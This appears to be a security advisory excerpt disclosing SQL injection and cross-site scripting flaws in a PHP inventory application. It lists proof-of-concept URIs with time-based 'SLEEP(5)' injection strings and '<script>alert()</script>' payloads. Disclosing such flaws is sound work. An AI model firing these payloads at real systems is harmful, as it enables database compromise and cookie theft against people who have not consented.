Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
An attacker can exploit these issues through a browser. To exploit a cross-site scripting issue, the attacker must entice an unsuspecting victim to follow a malicious URI.
The following example URIs are available:
http://www.example.com/inventory/consulta_fact.php?fact_num=17 AND SLEEP(5)
http://www.example.com/inventory/addinventario.php?ref=555-555-0199@example.com'AND SLEEP(5) AND 'EJxe'='EJxe&sn=555-555- 0199@example.com' AND SLEEP(5) AND 'IgkP'='IgkP&factura=555-555-0199@example.com' AND SLEEP(5) AND 'CFdY'='CFdY
http://www.example.com/inventory/newtransact.php?ref=RSC-280' AND SLEEP(5) AND 'wIUB'='wIUB
http://www.example.com/inventory/consulta_fact.php?fact_num=<script>alert(1)</script>
http://www.example.com/inventory/newinventario.php?sn=<script>alert(100)</script>
http://www.example.com/inventory/newtransact.php?ref=<script>alert(100)</script>